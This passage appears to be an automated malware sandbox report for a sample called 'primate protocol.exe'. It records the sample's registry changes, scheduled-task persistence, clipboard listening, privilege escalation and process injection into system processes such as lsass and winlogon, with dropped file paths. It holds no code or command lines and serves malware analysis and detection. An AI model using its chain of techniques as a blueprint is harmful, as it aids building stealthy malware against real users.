Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1153236273-2212388449-1493869963-1000\{C39E5D0C-9F5A-4087-ACFB-9AFB8511C36F} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1153236273-2212388449-1493869963-1000\{1B8FE61C-B4DB-4F04-8069-E6E2E8EE2AD7} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A
N/A | N/A | C:\Windows\System32\schtasks.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\systemprocess.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\systemprocess.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\host.exe | N/A
N/A | N/A | C:\Windows\host.exe | N/A
N/A | N/A | C:\Windows\host.exe | N/A
N/A | N/A | C:\Windows\host.exe | N/A
N/A | N/A | C:\Windows\host.exe | N/A
N/A | N/A | C:\Windows\host.exe | N/A
N/A | N/A | C:\Windows\host.exe | N/A
N/A | N/A | C:\Windows\host.exe | N/A
N/A | N/A | C:\Windows\host.exe | N/A
N/A | N/A | C:\Windows\host.exe | N/A
N/A | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A
N/A | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A
N/A | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A
N/A | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A
N/A | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A
N/A | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A
N/A | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\systemprocess.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\systemprocess.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\CompPkg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\CompPkg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\host.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\systemprocess.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2492 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2492 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2492 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2492 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2492 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2492 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2492 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\systemprocess.exe
PID 2492 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\systemprocess.exe
PID 2492 wrote to memory of 5948 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\host.exe
PID 2492 wrote to memory of 5948 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\host.exe
PID 2492 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\CompPkg.exe
PID 2492 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\CompPkg.exe
PID 3880 wrote to memory of 4756 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3880 wrote to memory of 4756 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1060 wrote to memory of 4760 N/A C:\Windows\CompPkg.exe C:\Windows\System32\schtasks.exe
PID 1060 wrote to memory of 4760 N/A C:\Windows\CompPkg.exe C:\Windows\System32\schtasks.exe
PID 1928 wrote to memory of 4904 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\CompPkg.exe
PID 1928 wrote to memory of 4904 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\CompPkg.exe
PID 3880 wrote to memory of 4036 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\netsh.exe
PID 3880 wrote to memory of 4036 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\netsh.exe
PID 3880 wrote to memory of 2592 N/A C:\Windows\systemprocess.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3880 wrote to memory of 2592 N/A C:\Windows\systemprocess.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5948 wrote to memory of 704 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 5948 wrote to memory of 704 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 5948 wrote to memory of 704 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 5948 wrote to memory of 704 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 5948 wrote to memory of 704 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 5948 wrote to memory of 704 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4492 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4492 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4492 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4492 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4492 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4492 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 6036 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4832 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4832 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4832 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4832 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1632 wrote to memory of 4832 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4480 wrote to memory of 3148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3148 wrote to memory of 616 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 3148 wrote to memory of 672 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 3148 wrote to memory of 960 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3148 wrote to memory of 336 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 3148 wrote to memory of 408 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3148 wrote to memory of 1044 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3148 wrote to memory of 1072 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3148 wrote to memory of 1080 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

